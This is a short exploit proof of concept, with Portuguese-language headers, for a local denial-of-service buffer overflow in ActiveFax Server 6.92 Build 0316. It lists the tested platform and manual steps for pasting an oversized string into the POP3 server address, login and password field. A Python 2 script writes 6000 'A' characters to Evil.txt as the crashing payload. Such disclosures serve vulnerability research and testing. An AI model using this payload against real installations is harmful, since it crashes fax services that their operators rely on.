ActiveFax Server 6.92 Build 0316 – ‘POP3 Server’ Denial of Service

# Exploit Title: ActiveFax Server 6.92 Build 0316 – Negação de serviço ‘Servidor POP3’
# Data: 2019-10-12
# Página inicial do fornecedor: https://www.actfax.com/
# Link do software: https://www.actfax.com/download/actfax_setup_x64_ge.exe
# Exploit Autor: Aquiles
# Versão testada: 6.92
# Testado em: Windows 7 x64
# Tipo de vulnerabilidade: Estouro de buffer local de negação de serviço (DoS)

# Passos para produzir o crash:
# 1.- Executar código python: ActiveFax_Server.py
# 2.- Abra EVIL.txt e copie o conteúdo para a área de transferência
# 3.- Abra o ActiveFaxServer.exe
# 4.- Abra a configuração do servidor Pop3
# 5.- Pressione Novo
# 6.- Cole o conteúdo de EVIL.txt no campo: ‘Endereço do servidor POP3, login e senha’
# 7.- Pressione ok duas vezes
# 8.- E você verá um acidente.

#!/usr/bin/env python

buffer = "\x41" * 6000

try:
	f=open("Evil.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"